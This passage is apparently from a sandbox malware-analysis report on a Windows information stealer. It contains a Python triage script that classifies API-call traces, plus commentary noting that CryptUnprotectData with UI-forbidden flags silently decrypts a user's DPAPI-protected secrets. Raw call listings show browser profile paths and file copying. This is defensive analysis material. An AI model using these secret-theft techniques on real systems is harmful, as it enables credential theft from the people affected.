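• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F6778D
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00F677AD
• LocalFree.KERNEL32(?), ref: 00F677B7
APIs
  • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F83A96
• Process32First.KERNEL32(00000000,00000128), ref: 00F83AA9
• Process32Next.KERNEL32(00000000,00000128), ref: 00F83ABF
  • Part of subcall function 00F87310: lstrlen.KERNEL32(------,00F65BEB), ref: 00F8731B
"""

# One report line: optional "Part of subcall function X:", Name.MODULE,
# an optional "(args)" group (wsprintfA has none), then "ref: <addr>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple            # raw argument tokens as printed ("?" = unknown)
    ref: int               # address of the call site
    subcall_of: str | None = None   # set when the call lives in a callee

    def arg_int(self, i: int, default=None):
        """Integer value of argument i, or default for '?', '------', missing."""
        try:
            return int(self.args[i], 16)
        except (IndexError, ValueError):
            return default


def parse_report(text: str) -> list[list[ApiCall]]:
    """Split a report excerpt into per-function lists of ApiCall records."""
    functions: list[list[ApiCall]] = []
    current: list[ApiCall] | None = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            current.append(ApiCall(m["name"], m["module"], args,
                                   int(m["ref"], 16), m["sub"]))
    return functions


# Capability table (editor's assumption): every listed API must appear among
# the function's own calls; "Part of subcall" lines are not counted.
SIGNATURES = {
    "timezone_fingerprint": {"GetTimeZoneInformation", "wsprintfA"},
    "dpapi_decrypt": {"CryptUnprotectData"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32First",
                            "Process32Next"},
}
CRYPTPROTECT_UI_FORBIDDEN = 0x1   # CryptUnprotectData dwFlags: never prompt
TH32CS_SNAPPROCESS = 0x2          # CreateToolhelp32Snapshot: process list


def classify(calls: list[ApiCall]) -> tuple[list[str], dict]:
    """Return (sorted capability labels, argument-level notes) for one function."""
    own = {c.name: c for c in calls if c.subcall_of is None}
    caps = sorted(k for k, need in SIGNATURES.items() if need <= set(own))
    notes: dict = {}
    if "dpapi_decrypt" in caps:
        c = own["CryptUnprotectData"]
        # args: pDataIn, ppszDescr, pOptionalEntropy, pvReserved, pPrompt, dwFlags, pDataOut
        notes["ui_forbidden"] = bool(c.arg_int(5, 0) & CRYPTPROTECT_UI_FORBIDDEN)
        notes["no_entropy"] = c.arg_int(2) == 0
    if "process_enumeration" in caps:
        c = own["CreateToolhelp32Snapshot"]
        notes["snapshots_processes"] = bool(c.arg_int(0, 0) & TH32CS_SNAPPROCESS)
    return caps, notes


def triage(text: str) -> list[tuple[list[str], dict]]:
    """Classify every function in a report excerpt."""
    return [classify(calls) for calls in parse_report(text)]


if __name__ == "__main__":
    for i, (caps, notes) in enumerate(triage(SAMPLE_REPORT), 1):
        print(f"function {i}: {caps or ['-']} {notes}")
```

Running the block prints one line per function; the same parser accepts the APIs text of any other entry in this report. The DPAPI check reads dwFlags (argument index 5) and pOptionalEntropy (index 2): flags 0x1 with NULL entropy and a NULL prompt structure is the pattern for silently decrypting the current user's DPAPI-protected blobs, which in a stealer typically means browser-stored secrets, though the report does not say which blobs this sample targets. The Toolhelp32 walk over TH32CS_SNAPPROCESS is what backs the "Searches for specific processes" and "Tries to detect process monitoring tools" signatures listed at the top of the report.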
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: &+V_$>lX$sg_$3Ju
                                    • API String ID: 0-3780354508
                                    • Opcode ID: 745e04d2ce4acf4a2e196db80d90fc194cc8c7e1e0d621c6f12c72a5069d0cb6
                                    • Instruction ID: 65c5173bdbe260429bf01050fd4118cb74094909aa7c7602247703b290a9aa01
                                    • Opcode Fuzzy Hash: 745e04d2ce4acf4a2e196db80d90fc194cc8c7e1e0d621c6f12c72a5069d0cb6
                                    • Instruction Fuzzy Hash: E6B225F3A086049FE3046E2DEC8567AFBE9EFD4720F16493DEAC4C7744EA3558058692
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: /0\U$@CM_$ftT{$qL4|
                                    • API String ID: 0-742752915
                                    • Opcode ID: 6af1be2171514f30faa8361909d42f3a5f6d7567c251a1b6b4e178e780014cb6
                                    • Instruction ID: 82266f5badea7966efe8d4857ece81404c2c101986c9094ffc5cc0bc6fb97800
                                    • Opcode Fuzzy Hash: 6af1be2171514f30faa8361909d42f3a5f6d7567c251a1b6b4e178e780014cb6
                                    • Instruction Fuzzy Hash: 22A2E4F3A0C204AFE7046F29EC8567AFBE5EF94720F16492DE6C483744E63558058B97
                                    APIs
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F83A96
                                    • Process32First.KERNEL32(00000000,00000128), ref: 00F83AA9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F83ABF
                                      • Part of subcall function 00F87310: lstrlen.KERNEL32(------,00F65BEB), ref: 00F8731B
                                      • Part of subcall function 00F87310: lstrcpy.KERNEL32(00000000), ref: 00F8733F
                                      • Part of subcall function 00F87310: lstrcat.KERNEL32(?,------), ref: 00F87349
                                      • Part of subcall function 00F87280: lstrcpy.KERNEL32(00000000), ref: 00F872AE
                                    • CloseHandle.KERNEL32(00000000), ref: 00F83BF7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: a010f0a44bc749c8f30944cf5d1885dbccc9fc4c1255aa04568aeb29a854150d
                                    • Instruction ID: 39fc45ca2b447e06791ef0c9fddf150c60d4fc6c9099a675f591ae38b547d5cd
                                    • Opcode Fuzzy Hash: a010f0a44bc749c8f30944cf5d1885dbccc9fc4c1255aa04568aeb29a854150d
                                    • Instruction Fuzzy Hash: 2481F570901208CFD728EF18C848B95B7E1FB85728F29C1ADD4189B2B2D3769D82DF80
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00F6EA76
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00F6EA7E
                                    • lstrcat.KERNEL32(00F8CFEC,00F8CFEC), ref: 00F6EB27
                                    • lstrcat.KERNEL32(00F8CFEC,00F8CFEC), ref: 00F6EB49
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: fa1d216a7adc59f59d21981478ef98816773e095ad93a230fcd3ea48e414e6a6
                                    • Instruction ID: c55528187c85fa9b543c7789ba8f7ab267287e7c2de1b8946da8f7c848bd9800
                                    • Opcode Fuzzy Hash: fa1d216a7adc59f59d21981478ef98816773e095ad93a230fcd3ea48e414e6a6
                                    • Instruction Fuzzy Hash: 26312376A00118ABEB209B48EC45FEEB77DDF84304F044079FA18E6240D7B05A048BB2
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00F840CD
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00F840DC
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F840E3
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00F84113
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptHeapString$AllocateProcess
                                    • String ID:
                                    • API String ID: 3825993179-0
                                    • Opcode ID: a5a34135b2a3cdaae36d2b34cda39a23a74923f92cfabe2b200478fd5cc0912e
                                    • Instruction ID: e5053d4aafdf6848fe0e17a27ca11c69d5ef2cc55becd02dfda50518e4769046
                                    • Opcode Fuzzy Hash: a5a34135b2a3cdaae36d2b34cda39a23a74923f92cfabe2b200478fd5cc0912e
                                    • Instruction Fuzzy Hash: F0012170600209BBDB24DFA5DC55BAB7BADEF45311F108169FD19C7340DA71E980DB54
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00F8A3D0,000000FF), ref: 00F82B8F
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00F82B96
                                    • GetLocalTime.KERNEL32(?,?,00000000,00F8A3D0,000000FF), ref: 00F82BA2
                                    • wsprintfA.USER32 ref: 00F82BCE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: b0d8ebe8e9e81633f6a259fa6cc16757df6a6c5c1274f492544660c3b08f80b0
                                    • Instruction ID: a8e29a3a2cb7a4633dc680ad00c005d09166077a8eaf9da3db6f8dfcfcf825bf
                                    • Opcode Fuzzy Hash: b0d8ebe8e9e81633f6a259fa6cc16757df6a6c5c1274f492544660c3b08f80b0
                                    • Instruction Fuzzy Hash: 080152B2904128ABCB249BCADD45FBFB7BCFB4DB11F00011AF625A2280E7795840C7B1
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00F69B3B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F69B4A
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00F69B61
                                    • LocalFree.KERNEL32 ref: 00F69B70
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 224cd8933deaabad2c8f4d96f9854fd30490e8c8cc2f1b7c8dc951b0ebaf3ba3
                                    • Instruction ID: 2ea600fe6e2c7daf95df5fe710c4227b28cba67346a5deec516e85a3df90a477
                                    • Opcode Fuzzy Hash: 224cd8933deaabad2c8f4d96f9854fd30490e8c8cc2f1b7c8dc951b0ebaf3ba3
                                    • Instruction Fuzzy Hash: 2BF01D707443126BFB301F65AC4AF967BACEF44B60F240128FA55EA2D4D7B09880CBA4
                                    APIs
                                    • CoCreateInstance.COMBASE(00F8B110,00000000,00000001,00F8B100,?), ref: 00F7CB06
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00F7CB46
                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 00F7CBC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                    • String ID:
                                    • API String ID: 1940255200-0
                                    • Opcode ID: 51421798860e513ea208689c9750f602de3ec5ae43e6ea52af746ce8f5e4913b
                                    • Instruction ID: 09e14a04a05b4b2362858c6d1a7e4dd53e57659af97d30ccd8e28f74a5917087
                                    • Opcode Fuzzy Hash: 51421798860e513ea208689c9750f602de3ec5ae43e6ea52af746ce8f5e4913b
                                    • Instruction Fuzzy Hash: 4F318671A40618AFD710DB98CC96F9977B99B88B10F004194FA14EB2D0D7B0ED44CB91
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F69B9F
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00F69BB3
                                    • LocalFree.KERNEL32(?), ref: 00F69BD7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: aa6992f05c9955b54be81f6f60f3070241eaf179d8e753dd56c71d7f3badfecd
                                    • Instruction ID: 9e1b2eead1f7be13cac1eed9eadef8ea634170080cdcf12afaa17e39051ae31f
                                    • Opcode Fuzzy Hash: aa6992f05c9955b54be81f6f60f3070241eaf179d8e753dd56c71d7f3badfecd
                                    • Instruction Fuzzy Hash: 330112B5E413096BE7149BA4DC45FAEB77CEB84700F104568EA14AB284D7B49E0487D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: >93_$wyoQ
                                    • API String ID: 0-2578126433
                                    • Opcode ID: 265584ed7f851db84cc0d2b9c758dbeccc52e32d027aabd4f71cb8b899067395
                                    • Instruction ID: 10f1ed35feccde59dbea23d9239e5b959edc41dbf3a369748b9f9390802b60c7
                                    • Opcode Fuzzy Hash: 265584ed7f851db84cc0d2b9c758dbeccc52e32d027aabd4f71cb8b899067395
                                    • Instruction Fuzzy Hash: 0EA2D5F360C600AFE704AF29EC8567ABBE9EF94720F16493DE6C4C7744E63558408697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: |xO$|[
                                    • API String ID: 0-488323096
                                    • Opcode ID: f95eab0dbb3495e2ad418f5454b6aa9766b536a10902f4e926d46d0bf604470e
                                    • Instruction ID: 81eee3f4c1e7e090b7e707d680f52fc73dfb6e2fd107968a909474a1276817a4
                                    • Opcode Fuzzy Hash: f95eab0dbb3495e2ad418f5454b6aa9766b536a10902f4e926d46d0bf604470e
                                    • Instruction Fuzzy Hash: 8922F9F360C6049FE304AE2DDC8566AFBE9EF94320F164A3DEAD4C3740EA3558158697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z7
                                    • API String ID: 0-4264498725
                                    • Opcode ID: fc0266fd930a66f52fda9fe26213ead1e5033642ce098422bbde41be8c384d2c
                                    • Instruction ID: 8a3a2ef7b7cdd2507b290369ca99b49131663e84f846a893feaddba67bc1cfd5
                                    • Opcode Fuzzy Hash: fc0266fd930a66f52fda9fe26213ead1e5033642ce098422bbde41be8c384d2c
                                    • Instruction Fuzzy Hash: 3E71F3F3E087109BE3146A2DEC8576AFBE5EB94720F1B453DDAC897380E9795C0486C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5b664fb0573a2b2c2e8fd89ca3c9f49df9851b68d53519ccf47bfd2afb8c3844
                                    • Instruction ID: f582bbd4fc66cb5807d0addf88357bb231e7b7f2a68bb4eb72fb49b426ed17b8
                                    • Opcode Fuzzy Hash: 5b664fb0573a2b2c2e8fd89ca3c9f49df9851b68d53519ccf47bfd2afb8c3844
                                    • Instruction Fuzzy Hash: 995119F3A0C2149BE3087E29EC5577BBADADBD4320F1B453DE7D883780E93A58014696
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e6167b4698de6f3a40c214b63f582359bb0070f054b74b12b1156891aa62e8c
                                    • Instruction ID: 8b2445bc2a90d691b29614bba459d65569d41210cc82fa6eb413580b75285ee3
                                    • Opcode Fuzzy Hash: 4e6167b4698de6f3a40c214b63f582359bb0070f054b74b12b1156891aa62e8c
                                    • Instruction Fuzzy Hash: 1141F3F39187149FE3086E24EC4637AB7D4EB54310F1A893DEBC9D7380EA794841978A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b6f52173eba6c0cd5e8ce57c68523106f27917382e6f8a55d113f3a6a9893bd
                                    • Instruction ID: 83524f361edd6055be61ad386c4f233956717774262ac58d82e91390a0beb1db
                                    • Opcode Fuzzy Hash: 2b6f52173eba6c0cd5e8ce57c68523106f27917382e6f8a55d113f3a6a9893bd
                                    • Instruction Fuzzy Hash: 6621ADF281C7049FD309BF19DC826BAF7E9FF58210F16492DEAC493310EA7558508A87
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 00F78636
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7866D
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00F786AA
                                    • StrStrA.SHLWAPI(?,00A9E130), ref: 00F786CF
                                    • lstrcpyn.KERNEL32(011993D0,?,00000000), ref: 00F786EE
                                    • lstrlen.KERNEL32(?), ref: 00F78701
                                    • wsprintfA.USER32 ref: 00F78711
                                    • lstrcpy.KERNEL32(?,?), ref: 00F78727
                                    • StrStrA.SHLWAPI(?,00A9E148), ref: 00F78754
                                    • lstrcpy.KERNEL32(?,011993D0), ref: 00F787B4
                                    • StrStrA.SHLWAPI(?,00A9E160), ref: 00F787E1
                                    • lstrcpyn.KERNEL32(011993D0,?,00000000), ref: 00F78800
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                    • String ID: %s%s
                                    • API String ID: 2672039231-3252725368
                                    • Opcode ID: 2b0e2820d60f7f5bfcf1b3c306b278f9a601694c88a14e36671720407dda852b
                                    • Instruction ID: b3d4d02c7420f01d0d64ba8b7385922c6ff447d1f15f7ae2d3e499433df4faf7
                                    • Opcode Fuzzy Hash: 2b0e2820d60f7f5bfcf1b3c306b278f9a601694c88a14e36671720407dda852b
                                    • Instruction Fuzzy Hash: 87F1D071904118AFCB24DF64DD48ADEB7B9EF48304F1481A9F929E3244EB30AE41DBA1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61F9F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F61FAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61FDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F61FE3
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61FEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6200E
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6201A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F62042
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6204D
                                    • lstrlen.KERNEL32(00F91794), ref: 00F62058
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62075
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F62081
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F620AC
                                    • lstrlen.KERNEL32(?), ref: 00F620E4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62104
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F62112
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62139
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6214B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6216B
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F62177
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6219D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F621A8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F621D4
                                    • lstrlen.KERNEL32(?), ref: 00F621EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6220A
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F62218
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62242
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6227F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F6228D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F622B1
                                    • lstrcat.KERNEL32(00000000,00A9CF08), ref: 00F622B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F622F7
                                    • lstrcat.KERNEL32(00000000), ref: 00F62304
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6232D
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F62356
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62382
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F623BF
                                    • DeleteFileA.KERNEL32(00000000), ref: 00F623F7
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F62444
                                    • FindClose.KERNEL32(00000000), ref: 00F62453
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                    • String ID:
                                    • API String ID: 2857443207-0
                                    • Opcode ID: a224e364a99466cca434032921a7e4356ecfe12a051f531a0b7a44c9ae6baec7
                                    • Instruction ID: 792755f6796dc799ae998027b880ea891c53b2fd73b650ea064c4946cdaf2988
                                    • Opcode Fuzzy Hash: a224e364a99466cca434032921a7e4356ecfe12a051f531a0b7a44c9ae6baec7
                                    • Instruction Fuzzy Hash: 95E19371A11A0A9BDB61EFA4DD85A9E77B9BF44310F080038F915E7205DB38DD41EBA0
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76445
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F76480
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F764AA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F764E1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76506
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F7650E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F76537
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FolderPathlstrcat
                                    • String ID: \..\
                                    • API String ID: 2938889746-4220915743
                                    • Opcode ID: adbe477a7cbe748ddc339b9bf37f05a49159afef46084c27c44ad08f037b5a78
                                    • Instruction ID: 58a0108be4adb9c5dc4e0302f98cdc001f8e9448e1623468b10325388973c2b5
                                    • Opcode Fuzzy Hash: adbe477a7cbe748ddc339b9bf37f05a49159afef46084c27c44ad08f037b5a78
                                    • Instruction Fuzzy Hash: E4F1B270D01A099BDB25EF74DC49AAE77B4AF44314F088139F829DB245DB38DC45EBA2
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F743A3
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F743D6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F743FE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74409
                                    • lstrlen.KERNEL32(\storage\default\), ref: 00F74414
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74431
                                    • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00F7443D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74466
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F74471
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74498
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F744D7
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F744DF
                                    • lstrlen.KERNEL32(00F91794), ref: 00F744EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F74507
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F74513
                                    • lstrlen.KERNEL32(.metadata-v2), ref: 00F7451E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7453B
                                    • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00F74547
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7456E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F745A0
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F745A7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74601
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7462A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F74653
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7467B
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F746AF
                                    Strings
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                    • String ID: .metadata-v2$\storage\default\
                                    • API String ID: 1033685851-762053450
                                    • Opcode ID: b3f2ce0063c771ea0c60da39b327d87578abb394343e2451cfe96298ae88e3d2
                                    • Instruction ID: c880b1c51c176d8ce003fd15a3fe769c23ef226983cf51aed7e8e18785c6ecaf
                                    • Opcode Fuzzy Hash: b3f2ce0063c771ea0c60da39b327d87578abb394343e2451cfe96298ae88e3d2
                                    • Instruction Fuzzy Hash: 2AB1B770A116059BDB71EFB4DD49AAE77B8AF44314F084039F869D7241DB38EC41BBA2
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F757D5
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F75804
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75835
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7585D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F75868
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75890
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F758C8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F758D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F758F8
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7592E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75956
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F75961
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75988
                                    • lstrlen.KERNEL32(00F91794), ref: 00F7599A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F759B9
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F759C5
                                    • lstrlen.KERNEL32(00A9CFF8), ref: 00F759D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F759F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F75A02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75A2C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F75A58
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F75A5F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F75AB7
